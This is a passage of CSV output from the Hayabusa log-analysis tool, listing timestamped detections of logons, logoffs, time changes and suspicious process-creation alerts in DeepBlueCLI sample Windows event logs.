localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 
07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27008 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27038 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:48.104 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x27008,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:48:51.643 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x27038,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:51:16.890 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:22.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:51:29.601 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x12048 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - 
Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x12070 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x12048,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 08:03:14.476 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x12070,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:34:54.687 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:34:59.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:35:04.667 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x131c3 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x13216 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 
0x131c3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:57.635 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:41:21.932 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x13216,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:43:31.734 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:43:40.000 +09:00,IE9Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 
+2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:43:56.893 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x36aed : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x36b1d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x36aed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Not 
Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:59:00.431 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:15:07.962 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x36b1d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:15:39.306 +09:00,IE9Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:17:04.250 +09:00,IE10Win7,4624,informational,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:08.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:17:13.369 +09:00,IE10Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x11c02 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x11c32 : (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x11c02,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 03:30:25.009 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x11c32,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:46.785 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:48.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : 
Port: 0 : LogonID: 0x170f5 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x17125 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x170f5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:25:04.605 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x17125,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:51.420 +09:00,IE10Win7,4624,informational,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:54.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 08:25:55.414 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1ac86 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b245 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:55.414 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1ac86,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:26:40.560 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1b245,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:09.645 +09:00,IE10Win7,4624,informational,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:10.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-29 00:46:12.437 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1a23a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1a265 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:12.437 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1a23a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-29 00:48:19.456 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1a265,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1e056 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1e3c9 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 
0x1e056,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:33.911 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x6831f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x6832b : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : 
LogonID: 0x6831f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:20.053 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x6832b,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:36.671 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:37.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Not Existing 